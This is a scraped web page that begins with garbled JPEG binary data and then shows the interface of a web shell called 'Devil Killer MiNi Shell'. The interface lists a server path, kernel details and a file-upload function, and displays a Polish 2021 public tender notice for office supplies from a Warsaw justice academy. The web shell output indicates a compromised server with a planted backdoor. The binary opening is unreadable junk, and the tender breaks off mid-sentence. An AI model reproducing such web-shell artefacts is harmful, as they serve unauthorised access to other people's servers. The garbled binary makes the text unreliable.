JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210809/0014165401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00141654 z dnia 2021-08-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów biurowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Wyższa Wymiaru Sprawiedliwości</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 381510697</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wiśniowa 50</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">226024414</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@swws.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swws.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów biurowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4fdc77b5-f8f0-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00141654</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00062734/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Materiały biurowe / papier xero</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/swws <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/swws</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl, zwanej dalej „platformą”, pod adresem: https://platformazakupowa.pl/pn/swws. 2. W celu skrócenia czasu udzielania odpowiedzi na pytania zaleca się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem platformy i formularza „Wyślij wiadomość do zamawiającego”. 3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. 4. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformy do konkretnego wykonawcy. 5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania bezpośrednio na platformie komunikatów i wiadomości przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM. 6. Zamawiający, stosownie do treści § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz.U. z 2017 r. poz. 1320), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformie, tj.: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux lub ich nowsze wersje, 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0, 4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, 7) oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: 1) akceptuje warunki korzystania z platformy określone w Regulaminie zamieszczonym pod linkiem https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący, 2) powinien zapoznać się z instrukcją składania ofert dostępną pod adresem https://platformazakupowa.pl/strona/45-instrukcje i stosować się do jej zaleceń. 8. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z platformy, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert. Taka oferta zostanie uznana przez zamawiającego za ofertę handlową i nie będzie brana pod uwagę w niniejszym postępowaniu, ponieważ nie został spełniony obowiązek określony w art. 221 ustawy. 9. Zamawiający informuje, że instrukcje korzystania z platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">14/zp/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa materiałów biurowych. Zamówienie będzie zrealizowane na rzecz Szkoły Wyższej Wymiaru Sprawiedliwości; adres dostawy: Kampus Mundurowy Szkoły Wyższej Wymiaru Sprawiedliwości, 62-800 Kalisz, ul. Wrocławska 193-195.<br/>1.	Atrament do pióra	szt.	6<br/>2.	Biuwar z listwą – podkład na biurko z kalendarzem i notatnikiem	szt.	4<br/>3.	Bloczek samoprzylepny	szt.	50<br/>4.	Blok techniczny	szt.	5<br/>5.	Cienkopis czerwony	szt.	50<br/>6.	Cienkopis zielony	szt.	40<br/>7.	Cienkopis żółty	szt.	50<br/>8.	Cienkopis niebieski	szt.	50<br/>9.	Długopis automatyczny niebieski	szt.	150<br/>10. Długopis automatyczny czerwony	szt.	20<br/>11. Druk akcydensowy – pocztowa książka nadawcza	szt.	10<br/>12. Druk akcydensowy – polecenie wyjazdu służbowego	szt.	10<br/>13. Dziurkacz do 30 kartek	szt.	20<br/>14. Etykiety samoprzylepne uniwersalne A4	opak.	10<br/>15. Etykiety samoprzylepne uniwersalne A4	opak.	5<br/>16. Folia do laminowania A4	opak.	10<br/>17. Gąbka do tablicy suchościeralnej	szt.	20<br/>18. Gumka do ścierania	szt.	50<br/>19. Gumki recepturki	opak.	10<br/>20. Klej biurowy w sztyfcie	szt.	100<br/>21. Klipy biurowe do dokumentów 25 mm	opak.	106<br/>22. Koperta B4	szt.	2.500<br/>23. Koperta B5	szt.	2.200<br/>24. Koperta bąbelkowa 18H	szt.	500<br/>25. Koperta bąbelkowa 16F	szt.	500<br/>26. Koperta C4	szt.	2.500<br/>27. Koperta C5	szt.	600<br/>28. Koperta DL	szt	200<br/>29. Koperta rozszerzana C4	szt	2.100<br/>30. Koperta tekturowa A3	szt.	200<br/>31. Korektor	szt.	50<br/>32. Koszulki krystaliczne poszerzane	opak.	25<br/>33. Linijka aluminiowa – 20 cm	szt.	25<br/>34. Linijka aluminiowa – 50 cm	szt.	10<br/>35. Magnesy do tablicy	opak.	50<br/>36. Notes A5	szt.	20<br/>37. Nożyczki	szt.	30<br/>38. Olej do niszczarek	szt.	10<br/>39. Ołówek	szt.	100<br/>40. Papier ksero	ryza	750<br/>41. Pianka do ekranu	szt.	10<br/>42. Pianka do plastiku	szt.	10<br/>43. Pinezki	opak.	50<br/>44. Pióro kulkowe niebieskie	szt.	100<br/>45. Pióro kulkowe czerwone	szt.	50<br/>46. Płyn do czyszczenia tablic	szt.	30<br/>47. Poduszka do pieczątek	szt.	5<br/>48. Pojemnik na spinacze	szt.	50<br/>49. Przekładki kartonowe	opak.	16<br/>50. Segregator A4 szt.	30<br/>51. Skoroszyt plastikowy bez oczek	szt	200<br/>52. Spinacz 31 mm	opak.	30<br/>53. Taśma dwustronna	szt.	25<br/>54. Taśma klejąca bezbarwna	szt.	20<br/>55. Taśma pakowa	szt.	12<br/>56. Teczka do podpisu	szt.	10<br/>57. Teczka wiązana na akta studenckie	szt.	900<br/>58. Teczka papierowa na dokumenty	szt	100<br/>59. Teczka z gumką	szt.	350<br/>60. Temperówka	szt.	20<br/>61.	Tusz do stempli	szt.	20<br/>62.	Wąsy skoroszytowe	opak.	10<br/>63.	Zakładki samoprzylepne	kpl.	70<br/>64.	Zakreślacz	kpl.	45<br/>65.	Zeszyt A4 szt.	30<br/>66.	Zeszyt A5 szt.	40<br/>67.	Zszywki opak.	4<br/>68.	Zszywacz	szt.	5<br/>69.	Marker do tablic suchościeralnych	kpl.	50<br/>70.	Blok do flipchartów	szt.	60<br/>71.	Folia stretch czarna	szt.	10<br/>72.	Folia stretch przezroczysta	szt.	5<br/>73.	Segregator biurowy 50 mm	szt.	10<br/>74.	Segregator biurowy 40 mm	szt.	10<br/>75.	Pojemnik na czasopisma szt.	10<br/>76.	Linijka biurowa 30 cm	szt.	2<br/>77.	Kartki kostki nieklejone (bloczek)	opak.	10<br/>78.	Laminarka	szt.	1<br/>79.	Marker wodoodporny kpl.	6<br/>80.	Marker wodoodporny szt.	2<br/>81.	Plastelina	opak.	1<br/>82.	Korektor w taśmie	szt.	6<br/>83.	Zszywacz długoramienny	szt	1<br/>84.	Papier ksero A3	ryza	30<br/>85.	Foliopis dwustronny marker czarny permanentny	szt	10<br/>86.	Sznurek konopny	szt.	2<br/>87.	Igła archiwizacyjna	szt.	3<br/>88.	Taśma klejąca bezbarwna szeroka	opak.	10<br/>89.	Podkładka pod mysz żelowa pod nadgarstek	szt.	8<br/>90.	Karton ozdobny diamentowa biel 220 g/m2	opak.	5<br/>91.	Papier wizytówkowy gładki biały 200 ÷ 250 g/m2	opak.	10<br/>92.	Papier wizytówkowy gładki ecru 200 ÷ 250 g/m2	opak.	5<br/>93.	Papier satynowany do druku laserowego A4 160 g/m2, 250 szt. w opakowaniu	opak.	3<br/>94.	Zszywacz bezzszywkowy szt.	14<br/>95.	Przekładki kartonowe wąskie	opak.	2<br/>96.	Przekładki kartonowe wąskie czerwone	opak.	5<br/>97.	Teczka tekturowa z gumką biała	szt.	200<br/>98.	Teczka tekturowa z gumką granatowa	szt.	100<br/>99.	Teczka tekturowa z gumką czerwona	szt.	100<br/>100.	Skoroszyt plastikowy bez oczek czerwony	szt.	25<br/>101.	Skoroszyt plastikowy bez oczek niebieski	szt.	25<br/>102.	Skoroszyt plastikowy bez oczek zielony	szt.	15<br/>103.	Skoroszyt plastikowy oczkowy czerwony	szt.	25<br/>104.	Skoroszyt plastikowy oczkowy granatowy	szt.	25<br/>105.	Skoroszyt plastikowy oczkowy czarny	szt.	25<br/>106.	Grzbiet wsuwany do 60 kartek granatowy	szt.	15<br/>107.	Grzbiet wsuwany do 60 kartek czarny	szt.	15<br/>108.	Grzbiet wsuwany do 30 kartek granatowy	szt.	15<br/>109.	Grzbiet wsuwany do 30 kartek czarny	szt.	15<br/>110.	Pojemnik na dokumenty z szufladami	szt.	2<br/>111.	Pojemnik na dokumenty żółty	szt.	3<br/>112.	Pojemnik na dokumenty brzoskwiniowy	szt.	2<br/>113.	Pojemnik na dokumenty niebieski	szt.	3<br/>114.	Okładka do grzbietów wsuwanych przezroczysta	opak.	2<br/>115.	Okładka do grzbietów wsuwanych czarna	opak.	3<br/>116.	Okładka do bindowania niebieska	opak.	1<br/>117.	Okładka do bindowania czerwona	opak.	1<br/>118.	Półka na dokumenty	szt.	5<br/>119.	Segregator A4 bordowy 500 kartek	szt.	5<br/>120.	Segregator A4 szary 500 kartek	szt.	5<br/>121.	Segregator A4 niebieski 500 kartek	szt.	5<br/>122.	Segregator A4 szary 350 kartek	szt.	3<br/>123.	Segregator A4 niebieski 350 kartek	szt.	3<br/>124.	Segregator A4 bordowy 350 kartek	szt.	3<br/>125.	Segregator A4 żółty 350 kartek	szt.	3<br/>126.	Cienkopis niebieski	szt.	10<br/>127.	Cienkopis czarny	szt.	10<br/>128.	Długopis niebieski 1 mm	szt.	10<br/>129.	Długopis niebieski 0,07 mm	szt.	10<br/>130.	Długopis czarny 0,07 mm	szt.	10<br/>131.	Długopis czerwony 0,07 mm	szt.	5<br/>132.	Pióro kulkowe automatyczne 0,5 mm niebieskie szt.	5<br/>133.	Ołówek techniczny	szt.	6<br/>134.	Zakładki samoprzylepne strzałki indeksujące	opak.	10<br/>135.	Zakładki samoprzylepne indeksujące różowe	opak.	6<br/>136.	Zakładki samoprzylepne indeksujące zielone	opak.	6<br/>137.	Zakładki samoprzylepne indeksujące pomarańczowe	opak.	6<br/>138.	Zakładki samoprzylepne indeksujące mix kolorów	opak.	10<br/>139.	Zakładki samoprzylepne indeksujące papierowe	opak.	6<br/>140.	Koperty rozszerzane C4 brązowe	opak.	1<br/>141.	Koperty rozszerzane C4 białe	opak.	5<br/>142.	Koperty rozszerzane B4 białe	opak.	5<br/>143.	Koperty rozszerzane B4 brązowe	opak.	5<br/>144.	Koperta standardowa C4 biała	opak.	5<br/>145.	Koperta standardowa C4 brązowa	opak.	1<br/>146.	Przybornik na biurko	szt.	5<br/>147.	Kubek na długopisy	szt.	4<br/>148.	Książka korespondencyjna granatowa 300 kart	szt.	1<br/>149.	Książka korespondencyjna bordowa 300 kart	szt.	1<br/>150.	Teczka do podpisu 20 kart. bordowa	szt.	2<br/>151.	Teczka do podpisu 20 kart. granatowa	szt.	2<br/>152.	Kartki samoprzylepne	szt.	8<br/>153.	Taśma pakowa szt.	5<br/>154.	Taśma klejąca z podajnikiem	szt.	5<br/>155.	Tusz do stempli purpurowy	szt.	2<br/>156.	Koperty perłowe	szt.	1.000<br/>157.	Papier do zaproszeń	szt.	500<br/>158.	Papier do zaproszeń	szt.	500<br/>159.	Torba prezentowa	szt.	100<br/>160.	Zszywacz podręczny	szt.	4<br/>161.	Zszywki	opak.	3<br/>162.	Spinacze 70 mm	opak.	10<br/>163.	Spinacze 28 mm	opak.	10<br/>164.	Przekładki kartonowe wąskie NIEBIESKIE	opak.	2<br/>165.	Przekładki kartonowe wąskie ŻÓŁTE	opak.	2<br/>166.	Przekładki kartonowe wąskie ZIELONE	opak.	2<br/>167.	Przekładki plastikowe numeryczne	opak.	4<br/>168.	Nóż do kopert	szt.	2<br/>169.	Marker dwustronny do płyt	szt.	3<br/>170.	Marker niebieski	szt.	2<br/>171.	Marker czerwony	szt.	2<br/>172.	Klip biurowy 15 mm	opak.	6<br/>173.	Klip biurowy 41 mm	opak.	5<br/>174.	Okładki do bindowania przezroczyste	opak.	2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30192000-1 - Wyroby biurowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22815000-6 - Notatniki</p> <p class="mb-0">22851000-0 - Skoroszyty</p> <p class="mb-0">30192121-5 - Długopisy kulkowe</p> <p class="mb-0">30192125-3 - Pisaki</p> <p class="mb-0">30197100-7 - Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie</p> <p class="mb-0">30197630-1 - Papier do drukowania</p> <p class="mb-0">30199500-5 - Segregatory, pudełka na listy, pudełka do przechowywania i podobne wyroby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-09-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierował się będzie kryterium najniższej ceny oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 5.5.), składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>Oferta złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia musi zawierać: a. wskazanie podmiotów w rozumienia art. 58 ustawy (nazwy i adresy); b. wskazanie pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wraz z załączeniem pełnomocnictwa; c. wskazanie adresu poczty elektronicznej, pod który ma służyć do komunikacji. Dokument ustanawiający pełnomocnika należy załączyć do oferty zgodnie z zasadami wskazanymi w pkt. 11 działu XIII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wymaga, aby wybrany wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy stanowiącym 